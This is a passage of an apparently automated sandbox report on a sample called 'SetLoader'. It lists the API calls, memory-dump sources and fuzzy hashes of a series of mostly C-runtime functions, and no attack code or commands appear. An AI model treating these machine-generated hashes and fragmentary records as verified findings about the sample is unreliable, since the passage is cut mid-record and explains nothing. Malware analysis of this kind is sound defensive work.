                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID: p,e
                                              • API String ID: 776569668-2941865787
                                              • Opcode ID: 5c10e6b979beaa344f8d0ceb7ab050ef4eb620e3503658146ff6b681c7fbd2fd
                                              • Instruction ID: f43220004febc9f05569eb0cd490f23ddae2de66913d08936ec7f5b3b2d7e7d2
                                              • Opcode Fuzzy Hash: 5c10e6b979beaa344f8d0ceb7ab050ef4eb620e3503658146ff6b681c7fbd2fd
                                              • Instruction Fuzzy Hash: 24F0B770810A219BCB8AEF15EC124883BA7F715B25B05720AF62E96272CB7749918FD4
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00635111,00634ECC,006321B4), ref: 00635128
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00635136
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0063514F
                                              • SetLastError.KERNEL32(00000000,00635111,00634ECC,006321B4), ref: 006351A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 0aa9fc7438669200ded9a05410e305dd0d8b8ba4c3280b9a5c8b905434613fd4
                                              • Instruction ID: 7f6056c6d54bd7432b2694a0bad16a9338ded5c34b268de5850fe38cb1b4600f
                                              • Opcode Fuzzy Hash: 0aa9fc7438669200ded9a05410e305dd0d8b8ba4c3280b9a5c8b905434613fd4
                                              • Instruction Fuzzy Hash: 69014736209B126EB72067B4FC867662F47EB07771FA0332DF111862E1EF514C0091C8
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063B9A9
                                              • _free.LIBCMT ref: 0063B9DC
                                              • _free.LIBCMT ref: 0063BA04
                                              • SetLastError.KERNEL32(00000000,?), ref: 0063BA11
                                              • SetLastError.KERNEL32(00000000,?), ref: 0063BA1D
                                              • _abort.LIBCMT ref: 0063BA23
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: cfe71196f4efb74afd25389386bbd954cb13147d144bc80054a052c1441424e7
                                              • Instruction ID: 472f32af510832c25c81059952591e677332c04e65691f1c9b9dfe15d1a836ce
                                              • Opcode Fuzzy Hash: cfe71196f4efb74afd25389386bbd954cb13147d144bc80054a052c1441424e7
                                              • Instruction Fuzzy Hash: 5BF0A436104A0167C796B725BD0ABAB256BDFC3B75F252118F715A22D3EF218C0251D9
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00630059
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00630073
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00630084
                                              • TranslateMessage.USER32(?), ref: 0063008E
                                              • DispatchMessageW.USER32(?), ref: 00630098
                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 006300A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 2148572870-0
                                              • Opcode ID: 4ce579dd56a91440ddfa2292f38963ba2510020c325beb5f837ae992a2754a4b
                                              • Instruction ID: 460d2b79de066a376ca1f2a1a2ee75c2257104ff03c68e1448b160e6ff826331
                                              • Opcode Fuzzy Hash: 4ce579dd56a91440ddfa2292f38963ba2510020c325beb5f837ae992a2754a4b
                                              • Instruction Fuzzy Hash: 43F0E7B2A0122DABDB346BA5DC4CEDB7F6EEF42791F009021B50AD2150D674D586CBE1
                                              APIs
                                                • Part of subcall function 00622663: _wcslen.LIBCMT ref: 00622669
                                                • Part of subcall function 0061D848: _wcsrchr.LIBVCRUNTIME ref: 0061D85F
                                              • _wcslen.LIBCMT ref: 0061E105
                                              • _wcslen.LIBCMT ref: 0061E14D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$_wcsrchr
                                              • String ID: .exe$.rar$.sfx
                                              • API String ID: 3513545583-31770016
                                              • Opcode ID: c6c728dfb29f1db6ef7ffcf1f6b15d3d559b383704df988e86cc3976ef456dd1
                                              • Instruction ID: 1644c175a7f711ab74eb98bd63c2c5022a909626fad49966199c20c821b71ffc
                                              • Opcode Fuzzy Hash: c6c728dfb29f1db6ef7ffcf1f6b15d3d559b383704df988e86cc3976ef456dd1
                                              • Instruction Fuzzy Hash: 29412522500B61A6C7326F30C852AFB73ABEF49745F19490EFC869B280E7A2CDD1C355
                                              APIs
                                              • _wcslen.LIBCMT ref: 0061DA59
                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0061BD19,?,?,00000800,?,?,?,0061BCD4), ref: 0061DB02
                                              • _wcslen.LIBCMT ref: 0061DB70
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$CurrentDirectory
                                              • String ID: UNC$\\?\
                                              • API String ID: 3341907918-253988292
                                              • Opcode ID: 133e4b5b19ec3233e9668466001b4080df3c528b43b80eaa860b953a082fcf07
                                              • Instruction ID: eeeeb53683484b28c3c71992d01b1fc8b5c14f56509aa067192d31910f28a543
                                              • Opcode Fuzzy Hash: 133e4b5b19ec3233e9668466001b4080df3c528b43b80eaa860b953a082fcf07
                                              • Instruction Fuzzy Hash: AB41A3B25083526ACB20EB60DCC1DFB73AFAF46740F0D481DF595D7281E7A498C5C6A6
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: %c
                                              • API String ID: 176396367-3300841138
                                              • Opcode ID: 4d1b6e8d5c290c8d747c1a2d4b8b821d835b0b94f48ba5b7b2f698b849a0c1f3
                                              • Instruction ID: 142fe0b1c59ef1e495a2deb4bbe3769a522c7c9db10f06b82f5ceaaa50930ed7
                                              • Opcode Fuzzy Hash: 4d1b6e8d5c290c8d747c1a2d4b8b821d835b0b94f48ba5b7b2f698b849a0c1f3
                                              • Instruction Fuzzy Hash: FA41D2719047529BC365DF38C85599FBBE9EF85300F04492DF989D3241EB30E9898BD6
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0063A676,0063B5C6,?,0063A616,0063B5C6,0064F7B0,0000000C,0063A76D,0063B5C6,00000002), ref: 0063A6E5
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0063A6F8
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0063A676,0063B5C6,?,0063A616,0063B5C6,0064F7B0,0000000C,0063A76D,0063B5C6,00000002,00000000), ref: 0063A71B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: a4060f8faf85166edec125cd85ac317c7ec1eacb49e2a5eb3e6f39546bc00853
                                              • Instruction ID: e70d852341bf0d8b082dd2d0ce9c6fa7a1e10489d70751712778a07ddbc011a9
                                              • Opcode Fuzzy Hash: a4060f8faf85166edec125cd85ac317c7ec1eacb49e2a5eb3e6f39546bc00853
                                              • Instruction Fuzzy Hash: 23F0A434540208FBCB009FA0DC89BEEBFB7EB09715F000068F805A2250CB705E40DB91
                                              APIs
                                                • Part of subcall function 00620244: _swprintf.LIBCMT ref: 00620284
                                                • Part of subcall function 00620244: _strlen.LIBCMT ref: 006202A5
                                                • Part of subcall function 00620244: SetDlgItemTextW.USER32(?,00652274,?), ref: 006202FE
                                                • Part of subcall function 00620244: GetWindowRect.USER32(?,?), ref: 00620334
                                                • Part of subcall function 00620244: GetClientRect.USER32(?,?), ref: 00620340
                                              • GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                              • SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                              • String ID: 0$pPe$pPe
                                              • API String ID: 2622349952-4176609419
                                              • Opcode ID: ce8ff5eea21ef35b8675650a6c3b11c15dbe9de05f3fc2c281c5a9ff30a662b1
                                              • Instruction ID: 1779f180d8d7b02b8f27b030917c1f46b0814706bb1b6bc5ca594921951220b4
                                              • Opcode Fuzzy Hash: ce8ff5eea21ef35b8675650a6c3b11c15dbe9de05f3fc2c281c5a9ff30a662b1
                                              • Instruction Fuzzy Hash: 76F0A43010434CA6DF190F21DC1DBEA3B6BAB02314F884114FE5958AD6DBB4C5D0DF50
                                              APIs
                                                • Part of subcall function 006228AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006228D4
                                                • Part of subcall function 006228AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00621309,Crypt32.dll,00000000,00621383,00000200,?,00621366,00000000,00000000,?), ref: 006228F4
                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00621315
                                              • GetProcAddress.KERNEL32(0065C1F0,CryptUnprotectMemory), ref: 00621325
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                              • API String ID: 2141747552-1753850145
                                              • Opcode ID: 88abc82235355af731ba170923895c403f73bcbeb4cdbd3dd374e8aeb021c2c4
                                              • Instruction ID: d3d2e191bd92e86842a2efaff16031dec957e89b4ca2ac11e3415f0766d52346
                                              • Opcode Fuzzy Hash: 88abc82235355af731ba170923895c403f73bcbeb4cdbd3dd374e8aeb021c2c4
                                              • Instruction Fuzzy Hash: CCE08674E44B519ED7209F34E9097827EE75F27B04F05881DF0C597A40D6B4D8848F52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AdjustPointer$_abort
                                              • String ID:
                                              • API String ID: 2252061734-0
                                              • Opcode ID: ce9ba01c3f7cdca20517c35aeb9b12882eb106da8b42e645210a9511885e997f
                                              • Instruction ID: d14ea677232ac3d70325c6ad440818e7ca30ce307fe3057a21d24e44b4e3cba9
                                              • Opcode Fuzzy Hash: ce9ba01c3f7cdca20517c35aeb9b12882eb106da8b42e645210a9511885e997f
                                              • Instruction Fuzzy Hash: B151DE72604A06AFEB298F50D841BBBB3A6EF44750F14452DE807972A1E7B1ED81CBD0
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0063E589
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0063E5AC
                                                • Part of subcall function 0063BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0063E5D2
                                              • _free.LIBCMT ref: 0063E5E5
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0063E5F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: f8f99e24e94c2590659496869475cdee92b359eef63dac1758e7da03ba3ac180
                                              • Instruction ID: 66239da2241e4a0a281646521d7690597f1eb23d091f1d0a32ebeecf9fb2c198
                                              • Opcode Fuzzy Hash: f8f99e24e94c2590659496869475cdee92b359eef63dac1758e7da03ba3ac180
                                              • Instruction Fuzzy Hash: 11012476601A117F2721567A9C48CFB6A6FEEC3BB47141129B904C3281FF638C0281F1
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,0063BC80,0063D7D8,?,0063B9D3,00000001,00000364,?,00636E12,?,?,?,0063688D,00000050), ref: 0063BA2E
                                              • _free.LIBCMT ref: 0063BA63
                                              • _free.LIBCMT ref: 0063BA8A
                                              • SetLastError.KERNEL32(00000000,?), ref: 0063BA97
                                              • SetLastError.KERNEL32(00000000,?), ref: 0063BAA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 13b31f34b097382eb5219dda4809775eff2e0a57bb86d03ba6260c8e079baa82
                                              • Instruction ID: 6d84133fa043f842bd7fb1ba617893ac1263ad2634a5f09093e3468c60e6e342
                                              • Opcode Fuzzy Hash: 13b31f34b097382eb5219dda4809775eff2e0a57bb86d03ba6260c8e079baa82
                                              • Instruction Fuzzy Hash: 7E01F936104F056B8316EB39AD96A9B216FDBC3775F212028F71592252EF718D0251E5
                                              APIs
                                                • Part of subcall function 006232AF: ResetEvent.KERNEL32(?), ref: 006232C1
                                                • Part of subcall function 006232AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 006232D5
                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000,5CB4B331,?,?,00000001,?,006452FF,000000FF,?,006243C0,?,00000000,?,00614766), ref: 00623007
                                              • CloseHandle.KERNEL32(?,?,?,006243C0,?,00000000,?,00614766,?,?,?,00000000,?,?,?,00000001), ref: 00623021
                                              • DeleteCriticalSection.KERNEL32(?,?,006243C0,?,00000000,?,00614766,?,?,?,00000000,?,?,?,00000001,?), ref: 0062303A
                                              • CloseHandle.KERNEL32(?,?,006243C0,?,00000000,?,00614766,?,?,?,00000000,?,?,?,00000001,?), ref: 00623046
                                              • CloseHandle.KERNEL32(?,?,006243C0,?,00000000,?,00614766,?,?,?,00000000,?,?,?,00000001,?), ref: 00623052
                                                • Part of subcall function 006230CA: WaitForSingleObject.KERNEL32(?,000000FF,006232E6,?), ref: 006230D0
                                                • Part of subcall function 006230CA: GetLastError.KERNEL32(?), ref: 006230DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                              • String ID:
                                              • API String ID: 1868215902-0
                                              • Opcode ID: d976b624cbbb37d14b11784fe6611d74340f2dc4a250ee406576c389f48d1905
                                              • Instruction ID: 8f67b71d1106bb51f5f197db946e4462e428676396e046033de1aa532f8745bf
                                              • Opcode Fuzzy Hash: d976b624cbbb37d14b11784fe6611d74340f2dc4a250ee406576c389f48d1905
                                              • Instruction Fuzzy Hash: 7D118476500B54EFC7229F64ED84FC6BBABFB09B11F00092DF16792260CB766A44CB65
                                              APIs
                                              • _free.LIBCMT ref: 0063EE67
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063EE79
                                              • _free.LIBCMT ref: 0063EE8B
                                              • _free.LIBCMT ref: 0063EE9D
                                              • _free.LIBCMT ref: 0063EEAF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 58f60ca051e567d1db11daf4343cfd97188c89a9b27e3e02e829135f0a3de4e9
                                              • Instruction ID: 98cf17d5fd5f99ea027fe57830e55f01fcbb3d6e70e4337840d27ac888f90089
                                              • Opcode Fuzzy Hash: 58f60ca051e567d1db11daf4343cfd97188c89a9b27e3e02e829135f0a3de4e9
                                              • Instruction Fuzzy Hash: AAF0EC32504701AF87A4EB69E886C9A77EBFA41711F541809F549D7681CB71FC808AA4
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
